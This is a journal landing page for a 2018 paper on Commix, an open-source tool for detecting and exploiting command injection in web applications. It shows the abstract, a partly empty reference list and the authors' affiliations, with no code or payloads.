International Journal of Information Security

, Volume 18, Issue 1, pp 49–72 | Cite as

Commix: automating evaluation and exploitation of command injection vulnerabilities in Web applications

  • Anastasios Stasinopoulos
  • Christoforos NtantogianEmail author
  • Christos Xenakis
Regular Contribution


Despite the prevalence and the high impact of command injection attacks, little attention has been given by the research community to this type of code injections. Although there are many software tools to detect and exploit other types of code injections, such as SQL injections or cross-site scripting, there is no dedicated and specialized software that detects and exploits, automatically, command injection vulnerabilities. This paper proposes an open-source tool that automates the process of detecting and exploiting command injection flaws on Web applications, named as COMMand Injection eXploiter (Commix). We present and elaborate on the software architecture and detection engine of Commix as well its extra functionalities that greatly facilitate penetration testers and security researchers in the detection and exploitation of command injection vulnerabilities. Moreover, based on the knowledge and the practical experience gained from the development of Commix, we propose and analyze new identified techniques that perform side-channel exploitation for command injections allowing an attacker to indirectly deduce the output of the executed command (i.e., also known as blind command injections). Furthermore, we evaluate the detection capabilities of Commix, by performing experiments against various applications. The experimental results show that Commix presents high detection accuracy, while at the same time false positives are eliminated. Finally and more importantly, we analyze several 0-day command injection vulnerabilities that Commix detected in real-world applications. Despite its short release time, Commix has been embraced by the security community and comes preinstalled in many security-oriented operating systems including the well-known Kali Linux.


Command injection Code injection Exploitation Software tool Web security 



This research has been funded by the ReCRED project (Horizon H2020 Framework Programme of the European Union under GA number 653417).


  1. 1.
  2. 2.
  3. 3.
    OWASP, Cross-site scripting (XSS),
  4. 4.
  5. 5.
    Alonso, C., Bordn, R., Antonio, G.: y Marta Beltrn Speakers, LDAP injection & blind LDAP injection. BlackHat, New York (2009)Google Scholar
  6. 6.
  7. 7.
  8. 8.
    Is IoT in the smart home giving away the keys to your kingdom?,
  9. 9.
    Wired, The internet of things is wildly insecure—and often unpatchable.
  10. 10.
  11. 11.
    Hackers are already using the shellshock bug to launch botnet attacks.
  12. 12.
    Vulnerability in citrix access gateway legacy authentication support could result in command injection.
  13. 13.
  14. 14.
  15. 15.
    Sophos web protection appliance sblistpack command injection exploit.
  16. 16.
    Papagiannis, I., Migliavacca, M., Pietzuch, P.: PHP Aspis: using partial taint tracking to protect against injection attacks. In: WebApps ’11: Proceedings of the 2nd USENIX Conference on Web Application Development, June 15–16, 2011, Portland, Oregon, USA (2011)Google Scholar
  17. 17.
    Bravenboer, M., Dolstra, E. Visser, E.: Preventing injection attacks with syntax embeddings. In: ’GPCE ’07: Proceedings of the 6th International Conference on Generative Programming and Component Engineering’, ACM, New York, NY, USA, pp. 3–12 (2007)Google Scholar
  18. 18.
    Su, Z., Wassermann, G.: The essence of command injection attacks in web applications. In: POPL ’06: Conference Record of the 33rd ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages, ACM Press, New York, NY, USA, pp. 372–382 (2006)Google Scholar
  19. 19.
    Lin, J.-C., Chen, J.-M.: The automatic defense mechanism for malicious injection attack. In: IEEE, 7th IEEE International Conference on Computer and Information Technology, 2007 (CIT 2007), Fukushima, Japan (2007)Google Scholar
  20. 20.
    Pietraszek, T., VandenBerghe, C.: Defending against injection attacks through context-sensitive string evaluation. In: Proceedings of 8th International Conference on Recent Advances in Intrusion Detection (RAID) (2005)Google Scholar
  21. 21.
    OWASP, Testing for command injection (OTG-INPVAL-013).
  22. 22.
    ExploitDB, Offensive security exploit database archive.
  23. 23., shell_exec - Execute command via shell and return the complete output as a string.
  24. 24., passthru—Execute an external program and display raw output.
  25. 25., system—Execute an external program and display the output.
  26. 26.
    Privoxy proxy,
  27. 27.
  28. 28.
  29. 29.
    Exfiltrate data using the old ping utility trick,
  30. 30.
    Damn Vulnerable Web Application (DVWA),
  31. 31.
    Extremely buggy web app (bWAPP),
  32. 32.
  33. 33.
  34. 34.
    Pentester Academy, Command Injection ISO: 1,,81/
  35. 35.
    TrustwaveSpiderLabs: MCIR (ShelLOL).
  36. 36.
    Petbot, Petbot-device client side code.
  37. 37.
  38. 38.
    Tantium generator (online).
  39. 39.
  40. 40.
  41. 41.
    Microsoft, Microsoft PowerBI.
  42. 42.
  43. 43.
  44. 44.
  45. 45.
  46. 46.
  47. 47.
  48. 48.
  49. 49.
  50. 50.
  51. 51.
    Wake-on-LAN (WOL) plugin.
  52. 52.
  53. 53., print_r - Prints human-readable information about a variable.
  54. 54.
  55. 55.
  56. 56.
  57. 57.
    Sabai Technology, VPN accelerator.
  58. 58.
    Stasinopoulos, A., Ntantogian, C., Xenakis, C.: The weakest link on the network: exploiting ADSL routers to perform cyber-attacks. In: Proceedings of 13th IEEE International Symposium on Signal Processing and Information Technology (ISSPIT 2013), Athens, Greece (2013)Google Scholar
  59. 59., escapeshellarg—Escape a string to be used as a shell argument.
  60. 60., escapeshellcmd—Escape shell metacharacters.
  61. 61.
  62. 62.
    PHP multibyte shell command escaping bypass vulnerability.
  63. 63.
    Stasinopoulos, A., Ntantogian, C., Xenakis, C.: Commix: detecting and exploiting command injection flaws. BlackHat, London (2015)Google Scholar
  64. 64.
    PHP extension and application repository—net library.
  65. 65.
    WAP, Web application protection.
  66. 66.
    Command injection test environment.
  67. 67.
    AWStats referrer arbitrary command execution vulnerability.
  68. 68.
    Stuttard, D., Pinto, M.: The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws, 2nd edn. Wiley, Hoboken (2011)Google Scholar
  69. 69.
    PHP-Charts v1.0 PHP code execution vulnerability.
  70. 70.
  71. 71.

Copyright information

© Springer-Verlag GmbH Germany, part of Springer Nature 2018

Authors and Affiliations

  • Anastasios Stasinopoulos
    • 1
  • Christoforos Ntantogian
    • 1
    Email author
  • Christos Xenakis
    • 1
  1. 1.Department of Digital SystemsUniversity of PiraeusPiraeusGreece

Personalised recommendations